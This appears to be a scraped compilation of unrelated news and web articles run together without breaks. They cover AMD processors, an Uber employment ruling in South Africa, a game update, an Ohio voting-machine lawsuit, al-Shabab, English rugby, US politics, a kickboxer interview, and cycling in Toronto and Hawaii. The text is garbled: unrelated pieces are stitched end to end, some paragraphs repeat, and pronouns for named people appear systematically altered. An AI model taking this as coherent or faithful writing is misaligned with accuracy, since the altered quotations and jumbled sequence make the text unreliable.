Ironically, it may be AMD that is best positioned to impact PC sales in 2017. AMD's Ryzen processor is generally expected to be far more competitive with Intel products than any chip the company has launched in the past four years. We've already likely seen Intel adjust its product stack in response, and Ryzen hasn't even launched yet. Better competition from AMD will likely drive some price cuts and new product introductions from Intel, and that, in turn, could spur consumer adoption of new chips from both companies. After five years of declines, even a flat year would be a win for the battered PC industry.
South Africa's Commission for Conciliation, Mediation and Arbitration (CCMA), in an in limine ruling, has found that Uber drivers in South Africa are employees within the meaning of the law. The order is available here. The facts found relevant by the tribunal will be familiar to readers following Uber's employment litigation in the United States and internationally. As are the legal arguments. As summarized by the Commissioner, Uber contended as follows:
First, there is no legal obligation on the part of any driver to drive any Uber registered vehicle or to use the Uber App, as is clear in the Uber BV service agreement. Second, there is also no right to instruct a driver to drive their vehicle, and the driver has a choice of where to drive and which passengers to transport. Third, a partner-driver may employ another driver to drive. Fourth, drivers are free to work whenever they like on anything else, including direct competitors. Fifth, the partner (and not Uber) is required to supply a vehicle and to carry all associated expenses. This is the essential tool of the trade and it is not provided by Uber. Sixth, the risk of profit or loss is borne by the partner as an independent contractor. Finally, a driver is free to move from one partner to another.
The drivers, for their part, argued that:
riders do not contract independent drivers, but Uber, and it is Uber that issues a receipt for its services. It is necessary to distinguish Uber from, for example, Airbnb where the customer knows that they or they are contracting with the guesthouse owner. . . . Drivers maintained that Uber controls them in a number of ways: They are required to personally perform their tasks; Uber controls their conduct and how they do the work through a system of ratings by the customer and policies regarding cancellation rates; Uber controls the actual conditions under which business is done, including pricing and the number of drivers in a city or at specific locations such as the airport. Drivers would control this if they were independent contractors; they would determine where and how to place themselves in the market.
The Commissioner's analysis began with a critique of the “tests” used to determine the existence of an employment relationship. Under South African law, these include “the control test, the organizational test, the economic dependence test and the dominant impression test.” According to the Commissioner, these tests “have become largely unhelpful, and in many instances key aspects of the tests point to employment, and others point to independent contracting.” They then proceeded to apply a “reality of the relationship test” and found the following factors especially relevant:
Drivers render personal services. The relationship is indefinite. Drivers are subject to the control of Uber. (Despite the fact that drivers choose when and how long to work, Uber controls “the manner in which they work by setting clear standards and performance requirements.” And, even though there is no “direct or physical supervision, control is exercised through technology, to the point that even the movement of the cell phone can be detected, indicating reckless driving.”) Drivers are economically dependent on the ability to drive for Uber. Uber drivers are the essential part of Uber's service.
The Commissioner did note that certain factors point in the other direction – away from a finding of employment status. But, in addition to the many specific factors indicative of employment, the Commissioner also relied on broader principles in ultimately finding an employment relationship. They wrote:
Promotion of social justice involves the balancing of power between those with resources and those who are in a weaker position in society. It involves protecting the rights of the weak and making it accessible to them to enforce their rights. An interpretation which promotes social justice must favour the drivers, who are in a considerably weak position when compared to Uber. Drivers' ability to earn an income is dependent on access to the app and the ability to drive. They are not independent contractors in any true sense and they are in fact highly dependent on Uber for work.
An important decision both for South Africa and for the ongoing international litigation over the question of employment status of Uber drivers – and gig workers more broadly.
Related
© 2019 On Labor | http://onlabor.org/south-african-labor-commission-uber-drivers-are-employees/
Greetings adventurers, Asterdahl here to talk to you about the new Random Queues feature that launched as part of Swords of Chult. There's been no shortage of discussion and I'd like to take a moment today to talk about a lot of the hot button issues, things we're doing to address some of your concerns, and the goals of the feature overall.
We have some of the immediate changes. First, random queues were not intended to slow down anyone's stronghold progression, so we're opening up the “Random Dungeon” daily dungeoneering shard quest to all level 70 players. In other words, level 70 players will have access to earning shards from three random queues: daily skirmish, daily dungeon and daily epic dungeon. This means that those who can tackle the epic dungeon random queue will earn more per day than was previously possible and those who can tackle only the dungeon and skirmish can earn just as many as they could earn before Swords of Chult launched.
Speaking of the skirmish random queue, we've heard everyone's feedback that the sudden jump to needing 10,000 item level to queue for random skirmishes, due to The Merchant Prince's Folly, can be stressful. So for the time being, we're removing the new skirmish from the random skirmish queue. This means that you will no longer end up in The Merchant Prince's Folly if you queue for a random skirmish, and that you no longer need to meet the requirements for that skirmish to queue for a random skirmish. Of course, you can still queue for The Merchant Prince's Folly directly. We'll be monitoring the activity in that skirmish, and at some point in the future, we'll be returning it to the random skirmish queue once everyone has had some time to adjust and increase their item level.
Both of these changes are going out this week on PC and will, of course, accompany the launch of random queues in Swords of Chult when it comes to console early next year. With these adjustments every level 70 character should be able to complete both the Random Skirmish and Random Dungeon queue with ease and earn as many rough astral diamonds and dungeoneering shards as they're used to.
We want to acknowledge the feedback regarding epic dungeons, unlocking requirements, and item level. The changes coming this week were for high priority issues we were able to act on quickly but there are other areas we would like to improve. Something specific we are looking at is the inconvenience of dealing with campaign tasks that generate dungeon chest keys. We plan to adjust these in the future but were unable to get them in for the current release.
I'd like to take a moment to talk about the high level goals for random queues: improving the public group community, reducing queue times, and varying up what queues everyone is playing.
When possible we'd all prefer players to play with their friends and guildmates, and so we haven't excluded the option to queue with a full group, but we'd like to create an experience that is generally positive when players do queue by themselves or in a partial group.
The fact that astral diamond bonuses were paid out identically from any queue created a world where only a small subset of queues is ever run. If new players didn't have this tribal knowledge they could end up waiting in an unpopular queue forever. Additionally, we don't think it's particularly exciting to run the same dungeon forever. Of course, we know for many of you it's about efficiency and that's why we made a more varied experience the most efficient one. With that in mind random queues had to not just be an alternative way to earn bonus AD but the way to earn bonus AD from queues.
We want to reiterate that with a big change like this, we're absolutely relying on all of you to provide your continued feedback. Our goal is that everyone feels they are earning roughly the same AD while having a more varied experience. We may not have hit that mark perfectly yet—we have to be a little conservative because it's nearly impossible to rein things in if we overshoot—but we will continue to monitor the situation and make improvements.
Thank you for reading and your continued patience! Keep the feedback coming and…See you on The Sword Coast!
Douglas "Asterdahl" Miller
Systems Designer
Discuss on official forum thread!
A lawsuit filed Monday, on the eve of the election by the co-chairperson of the Ohio Green Party and editor of FreePress.org, Bob Fitrakis alleges that software in some Ohio voting machines makes the machines vulnerable to having votes altered after they are cast.
The lawsuit involves machines made by Election Systems and Software out of Omaha, Nebraska, alleges that software on the machines could allow vote manipulation by non-election board officials.
The lawsuit comes days after FreePress.org published a report claiming that Husted had done an “end run” around Ohio law by installing the software on the vote tabulators in the weeks leading up to to the election. According to the report, the software was installed on machines that will be used by more than 4 million registered voters, including those in major metropolitan areas such as Cleveland and Columbus.
FreePress claimed it obtained a copy of the contract for the software from a source at Husted's office. The contract calls for the tabulation machine's vendor to “enter custom codes and interfaces to the standard election reporting software,” the publication claimed.
The lawsuit asks the court to order Jon Husted, Ohio's elections chief, not to use the machines Tuesday and to break state contracts with ES&S for voting machines to be used this year.
The machines are in Ohio's 25 most populous counties, said Columbus attorney Cliff Arnebeck, who filed the lawsuit.
(Visited 12 times, 1 visits today)
Image copyright AFP Image caption Many Somali women wear the niqab even in areas not controlled by al-Shabab
Somalia's al-Shabab militants have rounded up around 100 women and ordered them to comply with a strict Islamic dress code or risk being whipped.
The women were arrested in Buale, about 300km (185 miles) south-west of the capital, Mogadishu.
BBC Somali analyst Mohamed Mohamed says it is rare for al-Shabab to carry out such mass arrests.
The al-Qaeda-linked group controls much of southern and central parts of Somalia.
The women were arrested in the market, taken away and warned before being released.
Because it was their first offence, they were not punished but they could be whipped in public if caught again.
Our analyst says the temperature can reach 35C (95F) at this time of year and so many women preferred to wear lighter, traditional clothes than those approved by al-Shabab.
The women were told to wear a niqab, which covers all of their body and face, leaving just a small slit for their eyes.
Al-Shabab, whose name means "The Youth" in Arabic, advocates the strict Saudi-inspired Wahhabi version of Islam.
They have stoned to death people accused of committing adultery and amputated the hands of thieves.
A UN-backed government, aided by African Union forces, has pushed al-Shabab out of the country's main cities but it continues to stage deadly attacks there.
If losing the Grand Slam to Ireland was not bad enough, England have suffered the embarrassment of a celebration video being leaked to YouTube as well as thousands of unwanted commemorative T-shirts in the wake of Saturday's 24-8 defeat at Lansdowne Road.
If losing the Grand Slam to Ireland was not bad enough, England have suffered the embarrassment of a celebration video being leaked to YouTube as well as thousands of unwanted commemorative T-shirts in the wake of Saturday's 24-8 defeat at Lansdowne Road.
England's official kit suppliers Nike produced a special video under the title ‘Grand Slam Champions 2011' featuring a montage of Toby Flood, Chris Ashton, Ben Foden and other players in expectation of the odds-on favourites completing their first Six Nations clean sweep since 2003.
Embarrassingly, the video made its way onto internet site YouTube, much to the delight of Irish supporters, while it also emerged that Nike had printed 5,000 special limited edition T-shirts “inspired by the iconic Embarrassment for England as celebration video hits web image of the English rose”, which were due to go on sale at the final whistle.
Plans for celebratory screen advertisements at Waterloo, Kings Cross, Euston and Charing Cross train stations also had to be shelved.
Despite their Grand Slam failure, England still claimed the Six Nations championship but find themselves behind Ireland in the world rankings, with Declan Kidney's side leapfrogging the English and French into fourth place, making them the top-rated northern hemisphere side ahead of the World Cup later this year.
Singer Barbra Streisand, a major Hillary Clinton supporter and one of Hollywood's most outspoken progressive activists, is calling on President Obama to bypass Congress and unilaterally appoint their pick for the U.S. Supreme Court.
The Senate declined to hold hearings or votes on Judge Merrick Garland's nomination as part of its broad “advice and consent” power. Obama nominated Garland in March to replace the late Justice Antonin Scalia.
Now that Donald Trump has won the election and is set to nominate a judge, Streisand has circulated a petition urging Obama to quickly appoint Garland to the court before Trump can be sworn in as president.
“If you are concerned about the Supreme Court, please consider going to this website and signing a petition asking President Obama to appoint Merrick Garland,” Streisand wrote in a note to their supporters. “According to The Washington Post, they have the power to do this since Congress has refused to vote, and apparently that can be considered a waiver of its rights to advise and consent. If there are 100,000 signatures, the White House must give this its consideration.”
Streisand was referencing a Washington Post column by Gregory L. Diskant published in April. It was headlined, “Obama can appoint Merrick Garland to the Supreme Court if the Senate does nothing.”
The Appointments Clause of the Constitution states that the president “shall nominate, and by and with the Advice and Consent of the Senate, shall appoint … Judges of the Supreme Court, and all other Officers of the United States.”
Diskant claims the Appointments Clause actually grants two powers to the president: the power to “nominate” and the power to “appoint.” While the president must clearly seek the “Advice and Consent of the Senate,” Diskant argues, by deciding not to act and hold hearings or votes, the Senate has waived its right of advice and consent.
Somehow, Diskant claims, the Senate's failure to act on the nomination allows the president to unilaterally appoint an individual to the court.
At the time of this report, Streisand's petition had 107,464 signatures – more than the 100,000 required to get a response from the White House.
In August, Streisand told Australian journalist Michael Usher they would leave America if Trump won their race for the White House.
“He has no facts. I don't know, I can't believe it. I'm either coming to your country, if you'll let me in, or Canada,” they said.
It remains unclear whether they will actually choose to leave.
Reacting to the election of Donald Trump, Gov. Doug Ducey has called on the President-elect and Congress to hold off on a total repeal of the Affordable Care Act unless, and until, they come up with a replacement that protects Arizonans.
Ducey acknowledged that one of Trump's key campaign promises was to scrap the healthcare program, but since the state is taking federal money to expand Medicaid, it could endanger coverage for up to 400,000 individuals.
Ducey said the focus must be on replacing not repealing the law.
"The desire for citizens to have access to affordable health care is something that we share across party lines," Ducey said. "The fact that we want to see people with pre-existing conditions or hitting lifetime caps have a solution, that's something we would love to have a bipartisan discussion on. And it's finally something that, eight years later, we're going to."
The Affordable Care Act provides Arizona with financial incentives to expand its own Medicaid programs, but the state has been losing providers and rates have skyrocketed here and elsewhere.
Tomorrow night, Glory World Series will be putting on their 18th event in Oklahoma. The featured fare is a solid light heavyweight tournament featuring eight deadly men, all vying for a top contender spot resulting in an eventual title bout with current champion, Gokhan Saki.
Among those eight deadly men is a dynamic Congolese fighter named Zack Mwekassa. I'll admit, when my good friend Eric Jackman came to me with this interview opportunity, I didn't know a great deal about them other than they had soundly defeated former UFC heavyweight star, Pat Barry. I had no idea what a rare treat I was in for when I connected with them for the interview.
Dos Equis Beer has a very popular ad campaign featuring "The Most Interesting Man In The World." I'm fairly certain they've got the wrong man doing those commercials, because Zack Mwekassa is definitely a shoo-in for that title. From dragging family members away from a volcanic eruption to escaping the Congo after attempts to recruit them into rebel militia made it impossible for them to safely stay in their homeland, they have packed more life experience into 30 years than most human beings will ever see in 10 lifetimes. In fact, it would take an entire series of interviews to cover everything they have been through and experienced, but for now, I have an hour of content that they very graciously gave me after we initially agreed on 15 minutes.
If you didn't already know Zack from their professional boxing career where they hold a very respectable 15-4 record (including a couple of belts), then you might have become familiar with them earlier this year when they defeated Pat Barry in highlight reel fashion. When they reflect back on the fight, it is with great respect and admiration for their opponent.
I think Pat Barry is a tremendous fighter and I have a lot of respect for him. He's accomplished so much in the world of fighting. I thank them for giving me the opportunity to fight him. It would be ungrateful not to thank him. They put on me, a little bit of their fame, and I will always be grateful to them for that. He's a very strong person, mentally and a nice guy outside the ring, too. I was just ready. Mentally and physically, and the outcome just had to be that way.
The person you're speaking to now is Zack Mwekassa. The person that will land in Oklahoma is Zack the Black Warrior. Two entirely different people. I prefer the guy you're speaking to right now. He's a nice guy that likes to make jokes; a normal guy that's easy to hold a conversation with. Zack the Black Warrior is the other one; he's the vicious one, they feel nothing.
That fight launched Mwekassa's kickboxing career, being that it was their pro debut. While the contest was at heavyweight, they don't limit themselves on any particular weight class, going "wherever I am needed" as is the case with their participation in the LHW tourney.
They have unconventional training methods, opting not to watch footage of their opponents, and adopting a "warrior's diet" as part of their regimen. The most important aspect of their camp is the mental preparation involved in getting ready for battle.
A lot of people say that training is the hardest part of fighting, but I think the mental aspect, the mental preparation, is the hard part. People react differently to the idea of a fight. Some people, shortly before their fights, I'd say two weeks out or so, they become very sharp and aggressive. You speak to them, and they're already in that aggressive manner.
Some become very quiet. I feel like I'm one of the quiet ones. I've been through this many, many times, and I've found a way to walk around it. I'm getting better at it and keeping it together. My mental preparation is crucial. I don't go into a fight being unsure of myself. I go into a fight knowing that I'm going to destroy this man. Trust that when you see me walking towards that ring, you will know. No doubt about it.
The person you're speaking to now is Zack Mwekassa. The person that will land in Oklahoma is Zack the Black Warrior. Two entirely different people. I prefer the guy you're speaking to right now. He's a nice guy that likes to make jokes; a normal guy that's easy to hold a conversation with. Zack the Black Warrior is the other one; he's the vicious one, they feel nothing.
Diet is one of the most important aspects of a training camp, and for Zack, cultural practices figure heavily into what goes into their body about 3 weeks out from a fight.
That's a very important question. Everyone does different things. Some people do carb loading, some people do high protein, they do this or that...I'm an African, and I am very traditional. What I do when I prepare for a fight is I don't eat meat, fish, eggs or anything like that. I only eat what we call in Africa, mopane worms, which are basically dried caterpillars. That's all I eat, and I only drink water. I do this for 21 days before the fight. Just caterpillars and water.
I cannot explain to you scientifically what the value of eating this is or what exactly is in it, but it is food for war, it's food of warriors. African warriors would train for battle and they ate caterpillars. It has great elements of power and strength. I've been doing it for a while and I can feel the difference. I feel a lot faster, a lot stronger and I'm very explosive. It's a matter of culture, but hey, it works for me [laughs].
A common phenomenon among MMA fighters and athletes in general is jet lag. Mwekassa feels that jet lag is only a state of mind and people only speak of it when they lose.
Very frankly I'll tell you about jet lag [laughs]. It's a state of mind. People that lose talk about jet lag. I think you better know that talking about jet lag is just an excuse. Have you ever seen somebody win a fight and say they were jet lagged?
Very frankly I'll tell you about jet lag [laughs]. It's a state of mind. People that lose talk about jet lag. I think you better know that talking about jet lag is just an excuse. Have you ever seen somebody win a fight and say they were jet lagged? It's only when you lose that you say that.
As rumors started swirling about financial difficulties within Glory, largely in part due to 3 of its main draws not having their contracts extended, the Black Warrior doesn't let worry prey on their mind. A computer engineer by trade, Mwekassa has made sure to secure their future, allowing themselves the freedom to pursue fighting with a little more breathing room than most.
Honestly, I'm not worried. I'll tell you why. When you're walking upstairs, you don't need to see the last step, you just need to see the first one, and then the second, and so on. Tomorrow doesn't belong to anybody. It was not promised to me or to anyone else. I cannot be worried about tomorrow like that. I just need to be the best I can possibly be today. Besides fighting, I'm a computer network engineer. I'm not worried about these things because I've secured my future already.
Zack comes from a large family of professionals (2 brothers are doctors, father was the first accredited pharmacist in the Congo, a brother that's an attorney and another is an anthropologist), and while supportive, for a large part of their adult life, they made their way on their own.
I wasn't born and raised in South Africa. I'm originally from the Congo and moved here in 2004 after the war. I was there by myself. I was a young man of 20, alone. I felt hopeless. I left because of the war in the Congo.
I was arrested a few times because they wanted to forcefully enroll me in the rebel groups. They killed and raped people, stole from them, and committed many atrocities. At this stage, there are more than 300,000 rapes of women a year, and that's horrible.
They would see me walking down the street and would stop me, ‘Hey you're strong and you've got big muscles so you should be carrying a machine gun, not walking around like you own the place.' I should have kept my mouth shut, but I'm very much like my mother. Why should I do bad things like you guys are doing? Why should I kill innocent people and rape women? I won't do that. They beat me down, said they were going to kill me if I didn't do what they said. I was just very lucky to have escaped.
That's when I decided to leave. I had no one, but it was necessary to leave. I did crazy jobs to get by. Looking after people's cars, just anything legitimate I could do to get by. I've come a long way. I started my studies but I couldn't continue because I didn't have the money and my dad couldn't send any because they didn't have any money either. They were trying, but I said to him, ‘Dad, you need to stop. It's fine. I know you don't have any money. I'll take care of it myself.'
Around that time I started training and I did this to forget about my suffering and my difficulties. What would you call that? Destiny? Life? I don't know what you call it, but here I am. I am the Black Warrior now. I look at myself and think of how far I've come.
Zack's life experiences figure heavily into their mindset, which they feel makes them stronger and more fearless in the face of adversity. The old adage, ‘What doesn't kill you only makes you stronger' is definitely applicable here.
I come from a country with volcanic eruptions and war and I've survived those things. I've been bitten by a deadly snake, I've been shot. I did not die. I was poisoned, but I did not die. Do you think I would fear human beings in the ring wearing gloves? I don't think so.
I come from a country with volcanic eruptions and war and I've survived those things. I've been bitten by a deadly snake, I've been shot. I did not die. I was poisoned, but I did not die. Do you think I would fear human beings in the ring wearing gloves? I don't think so.
I'm going to tell you a story. I was only 18, just a young man when the volcano erupted. I was all by myself because my brothers and sisters were already gone. I was the only one there to take care of my parents and I did just that. It was terrible, and close quarters. You could barely walk. I was pulling my mother and my father while carrying a pack of about 80 kg on my back to escape the lava and ash.
I've been through so much in my life. Anybody that says they've been through a lot...well, there's "been through a lot" and then there's "been through a lot." You know what I mean? I'm only 30 years old but I feel like I'm 47 or older [laughs].
I know what my voyage is. I've been all over the world; Russia, Germany, France, the US...you name it. I know the direction I'm headed. So many people don't know, or it takes them until late in life to discover it, but I already know where I want to be.
Glory 18 is one leg of my journey. I'm not worried about anything. I don't want to seem arrogant, but I know the Black Warrior will take care of everything. I am coming to create mayhem. I didn't come for a belt, but I just happened to end up in the tournament that will lead to the belt. I want to bring the people something to talk about. I want everyone to be on the edge of their seats. Fights are not won at press conferences. It's in the ring that the truth will come out. When the Black Warrior walks into that ring, the truth will come out.
Zack Mwekassa faces Number 8 ranked kickboxer, Brian Collette tomorrow night in the first round of the card's tournament. You can purchase the event here:
http://www.gloryworldseries.com/en/glorytv/glory-18-oklahoma/375
You can follow Zack via their Twitter account, @ZackMwekassa
PHOENIX — Sedona, known for its red rock formations and picturesque sightseeing was recently ranked by Trip Advisor as the 13th best destination in the United States.
The unique nature of Sedona offers outdoor opportunities, including plenty of hiking trails, that most larger cities cannot be compared to. The small town in Arizona outranks several major American cities such as Nashville, Napa, and Miami Beach.
Recently, measures have been taken to preserve the natural beauty of Sedona.
Late in 2016 the Coconino National Forest received a $100,000 donation to preform maintenance on the many biking and hiking trails in and around the Sedona area.
Even Sen. John McCain (R-Ariz.) has been seen enjoying the Oak Creek Canyon in their downtime.
The area is also known as a spiritual destination. Sedona is home to many spas and healing destinations as well as the Chapel of the Holy Cross which seems to naturally extend right out of the already towering red rock landscape.
One of the most popular activities in the area are the Pink Jeep Tours which have even expanded into Scottsdale and the Grand Canyon area.
Three of the top five places on the list were places in the state of Hawaii. New York City claimed the number one spot on the list, while Las Vegas was ranked fifth.
Follow @KTAR923
Students and teachers from five local schools rallied on Thursday morning to express their support for the Bloor St. bike lanes. Gathering at the corner of Bloor and Christie streets, the group urged city hall to make the pilot project of protected bike lanes permanent, and to extend it farther east and west across the city.
Students and teachers from local schools turned out in full force Thursday to express their support for the Bloor St. bike lanes, which were installed last August after decades of advocacy from Toronto's cycling community. ( Ben Spurr / Toronto Star )
“As an every day biker I don't feel safe riding my bike without a clear division of ongoing traffic and bikes,” said Avani Karir, a Grade 11 student at Harbord Collegiate Institute. “If we had bike lanes, more people would be encouraged and inclined to cycle, and the more people cycling the more sustainable our community becomes.” The lanes extend along a 2.6-kilometre stretch of Bloor St. from Shaw. St. to Avenue Rd. Marika Kungla, a teacher who co-ordinates a bike club at the Ursula Franklin Academy in the High Park Neighbourhood farther west, said building separated lanes on Bloor St. near their school would benefit children and teachers. “Extending bike lanes would encourage more members of our school community to see cycling as a viable means of active transportation and as a safe, fun way to explore our city,” they said.
Article Continued Below
Kungla argued Toronto doesn't have an extensive network of separated bike lanes, which is a “barrier” for young people and others “not confident with sharing the road with motor vehicles.” Last week, a 5-year old boy was killed when they fell into traffic while riding their bike on a trail next to Lake Shore Blvd. West. Cycling advocates said their death could have been prevented if there had been a simple barrier between the trail and the roadway, and the incident prompted Mayor John Tory to order a safety review of the trail network. The city installed separated bike lanes on Bloor St. last August after decades of advocacy from Toronto's cycling community. The pilot project had strong support from council, and was approved in a 38-3 vote in May 2016. Council is expected to vote again this fall on whether to keep, modify or remove the lanes. An initial analysis released by the city in February and first reported by the Star found that while the number of cyclists using Bloor St. increased to 4,500 per day from 3,300 per day after the lanes were installed, travel times for drivers had increased by as much as 8 minutes and 25 seconds during afternoon rush hour. The city is holding a public meeting about the bike lanes on Monday, where transportation staff are expected to provide updates on a public survey, as well as brief residents on a technical evaluation of how the reconfigured street is working.
The survey was completed by more than 14,000 people, and while city staff have not yet released the results, according to the meeting materials the trends so far indicate that while cyclists report feeling safer, drivers “do not feel the trade-offs are worth it.” Jared Kolb, executive director of non-profit advocacy group Cycle Toronto, conceded that the upcoming council vote about whether to make the lanes permanent could be much closer than the one that approved their installation. “It could be. I guess we'll see where the data comes out,” they said. “It would be great to have a unanimous vote from city council that's saying this project is key. Where that winds up landing this fall, we'll see.”
The American Bar Association is looking into a complaint against Brigham Young University Law School alleging practices that go against ABA nondiscrimination guidelines. The complaint, filed by an advocacy group called FreeBYU, alleges that Mormons who lose or change their faith while in law school are kicked out of school before finishing their degree and LGBT students are forced to hide their sexual orientation and/or gender identity if they wish to avoid expulsion.
The Salt Lake Tribune breaks down the restrictions placed upon BYU students:
[B]reaking away from the LDS religion before graduation is against a conduct code signed by each student. So are homosexual relationships. Sex-reassignment surgery can lead to excommunication from the church, which would get students booted from the school.
Of course, as a religious school, BYU is allowed to show some religious preference in admissions, at least according to the ABA guidelines:
Religious institutions such as BYU have some leeway in tailoring their admissions and hiring processes to indicate a “preference” for people with a certain religious affiliation, according to the most recent ABA guidelines, so long as the preferences are clear before students and faculty come to campus. But the standards may not be used to limit academic freedom or to discriminate when it comes to admission or retention of students. The professional organization of attorneys and law students forbids schools from “taking action” based on race, religion, gender, nationality, sexuality, age or disability.
This isn't the first time BYU Law has come under fire for its practices. Another accrediting body, The Northwestern Commission on Colleges and Universities, has already looked into the allegations and found no violation. And the school seems confident in their continued ABA accreditation, saying, “We have been accredited by the ABA since 1974 and are confident that we continue to meet ABA standards.”
But are times a-changing. FreeBYU indicates they have over 2,800 signatures on a petition seeking a change in the school's policy; same-sex marriage is the law of the land, and trans folks are increasingly able to live their lives out loud and see their stories on television. Sooner or later — probably sooner — this is an issue BYU will have to come to grips with.
If you are a student at BYU Law and want to sound off against (or defend) your school's policy on LGBT students or religious freedom issues, please reach out to us. You can email us at tips@abovethelaw.com or send an SMS/text message to (646) 820-8477. We always keep the names of our tipsters strictly confidential.
National bar group looking into discrimination claim at BYU law school
[Salt Lake Tribune]
Will Mather has bike renting down to a science. He's able to fit a customer with the right size bike, discuss safety and road rules, equip them with a helmet and lock, and take payment for the rental, all in about seven minutes.
Mather is the store manager of The Bike Shop Kailua. In the past two years, bike rentals, particularly with Japanese tourists, have burgeoned in the Windward town. And The Bike Shop Kailua is one of the most popular rental outlets, especially after it moved three blocks to Kailua Road this past May.
“We know the perks of cycling,” says Mather, who bicycles to the store from their home in Honolulu. “It's associated with lower costs and exercise, but there's the added freedom, the beauty of riding. For us, as a bike shop, we want to stress the responsibility that comes with that.”
It's not just tourists pushing the pedal. For decades, bicycling has flourished in communities like Kailua and Haleiwa thanks to grassroots support, including mothers advocating for safe routes to and from school, and surfers looking for easier access to their favorite beaches. But the state as a whole, particularly Oahu, is becoming more bike friendly, part of a national trend. According to the League of American Bicyclists, the number of bicycling-friendly communities like Kailua has increased 105 percent from 2000 to 2013 nationally, and bicycle usage has gone up 46 percent nationwide.
In the past two years, Honolulu built its first protected bike lane down King Street – now the most used bike lane on Oahu – added bike lanes along parts of Waialae Avenue and hired an administrator to oversee the city's complete streets project, which requires that public streets serve all transportation needs. 2017 is on track to keep pace.
This summer, Oahu will join dozens of Mainland cities by launching Bikeshare Hawaii, a community bike rental network. Proponents say bicycling offers more than improved health and increased sales for bike shops – they say it also improves traffic and benefits stores and restaurants that are not in the cycling business.
TOURISM ON TWO WHEELS
About 30 white, green and orange cruisers gleam in the mid-morning sun. The rest of the 60-plus bike fleet is already roving Kailua's streets, operated mostly by Japanese tourists, and it wasn't even noon. A Japanese couple steady themselves on their colorful cruisers, then pedal out of the parking lot.
The rows of bikes are one of the first things you see after crossing the bridge into Kailua town. That's intentional, says Mather, who notes The Bike Shop Kailua's prime location and outside space were the top reasons why the shop moved there. Mather says rentals have increased 800 percent since they relocated, though sales and repairs remain the majority of the shop's business.
Kailua has become a must-visit for Japanese tourists during their Oahu vacations, and many arrive by tour bus for the day. Bikes are an easy and cost-effective way to explore the community's shops, restaurants, beaches and neighborhoods. Mather says their store hired a Japanese-speaking employee and provides Japanese-language pamphlets with Hawaii road rules and bike safety.
Tourists can choose from several rental shops in Kailua. With all the bikes now on Kailua's streets, local drivers have learned to be more vigilant of cycling tourists, who sometimes seem oblivious to the cars. But Mather says the shop is only aware of three significant incidents involving cyclists renting its bikes: improper street riding, locking a bike in the wrong place and, once last fall, some Japanese visitors had their bags stolen from their rentals. “The thing for us is to communicate with the customers coming in. Where are they coming from, what are they visiting for, how can we help facilitate that,” says Mather, adding that the bike shop gives visitors directions, makes suggestions and promotes locally owned businesses.
Among the most popular destinations for the cyclists, says Mather, are Kailua's beaches and the 3-mile Lanikai Loop. But time in town is just as important. Mather says he's heard anecdotally from Kailua restaurants and boutique owners that the self-guided, two-wheeled tours of the town have improved sales. They say visitors can save more money by renting a bike instead of a car – rentals are $15 for four hours – and spend more time and money shopping and dining, instead of searching for parking.
“With bikes, they can get around more quickly. Who's to say it's not the difference between a $30 sale and a $150 sale?” they say.
Thirty-four miles away, in Kahuku, Brett Lee has had similar success. Lee is the owner of Hele Huli Adventure Center at the Turtle Bay Resort. The one-stop center offers bike, moped, Segway and snorkel rentals as well as guided tours.
“Bike rentals have rocketed up to the No. 2 spot in overall revenue for my company,” says Lee, who started Hele Huli in 2009. They estimate that 500 to 600 people, most of them hotel guests, rent bikes from the center each month.
To meet demand, the resort opened a 3-mile mountain-bike trail in 2015, and plans to add three more miles. “There exists 12 miles of multi-purpose trails already, but it's much more appealing to people when there's a specific trail system for bikes only,” says Lee, adding that the center has also hosted racing events for kamaaina.
Lee says they also get visitors, nearly daily, who rent their bikes to ride off-campus for lunch at one of Kahuku's famous shrimp trucks, or to visit the North Shore's renowned surf breaks. “Bikes allow them to make that trek and explore (the North Shore) in more intimate fashion,” they say. “Unlike in a car, you can take in all the sounds, smells. Your senses are more stimulated.”
SHARING BIKES
Lori McCarney has rented bikes in cities across the country and understands the thrill cyclists get exploring new places. The longtime executive and triathlete is the CEO of Bikeshare Hawaii, a nonprofit founded in October 2014 and slated to launch this summer. Bikeshare will be a network where riders can check out bikes at one solar-powered docking station and then check them back into another station several blocks away. “It's sort of like personalized mass transit,” they say. “Bikes are bringing people back to the street.”
Bike-share networks have been successful across the Mainland, including in Portland, Chicago, New York and Washington, D.C. The programs provide increased access to bikes, without the cost of ownership or the burden of storage for apartment dwellers. In large cities, bike shares are often combined with walking, taking the bus or driving. McCarney says they want Bikeshare Hawaii to be another transportation option among the Island's existing options. It will cost $3.50 for 30 minutes, or $20 for 300 minutes that can be used in increments; monthly plans will range from $15 to $25.
Such programs have taken off elsewhere: New York City's Citi Bike logged 10 million rides in 2015; Chicago's Divvy had 3.2 million rides, with annual memberships costing $99 ($5 to low-income residents).
McCarney predicts good things for Oahu's program. The nonprofit conducted market research, they say, and “unlike other cities, we have all five factors that make for a successful bike share system.” They are good weather, flat terrain, urban density, government support and a tourism market.
They also expect the majority of Oahu's users will be visitors. “Visitors have a different price elasticity than residents,” says McCarney. “As a resident, you aren't going to pay the same amount of money for a functional transportation as for a pleasure trip.”
McCarney says the program will do more than provide alternative transportation. “I think bike share might be a solution to parking,” they say. For example, they say, the Chinatown Neighborhood Board is excited by Bikeshare's launch as a way to help alleviate the area's parking challenges.
In April to May, the organization plans to flood urban Honolulu with 1,000 to 1,200 bikes. There will be a bike station holding about 10 bikes every two to three blocks along main arteries like Kalakaua Avenue, King Street and Beretania Street, from River Street to Diamond Head. The organization has received $1 million from the city and $1 million from the state, as well as grants from Howard Hughes Corp., the Hawaiian Electric Industries Charitable Foundation and others.
McCarney says the nonprofit is approaching community organizations and businesses about station locations and, once they're installed, hopes to form promotions to support surrounding businesses. “It'll only be useful for you if it works in a lot of situations,” they say.
Dave Newman thinks Bikeshare Hawaii might be good for their business. Newman owns Pint + Jigger, on South King Street near McCully. The gastropub sits toward the end of the 2-mile King Street protected bike lane. Newman says when the bike path first opened, there was grumbling from neighboring businesses about traffic congestion, but they say cyclists and drivers have since more or less figured out the bike lane. (City data shows the bike lane has increased the time it takes to drive down King Street by an average of 30 seconds.) Newman says since the bike path opened two years ago, they now get regulars who arrive at the bar via bike, especially during its brunch hours.
“We have increased visibility. It's hard to see Pint + Jigger coming down King because of that tall apartment building,” they say. “We've had people come in who said they saw us when they were riding down the bike lane in the other direction. So now people can see us on King.”
Newman says he'd be open to having a Bikeshare Hawaii station in front of the bar. “Alternative transportation is going to get more popular,” they say. “The weather is nice, so why wouldn't you want to rent a bike and cruise around town?”
SAFETY FIRST
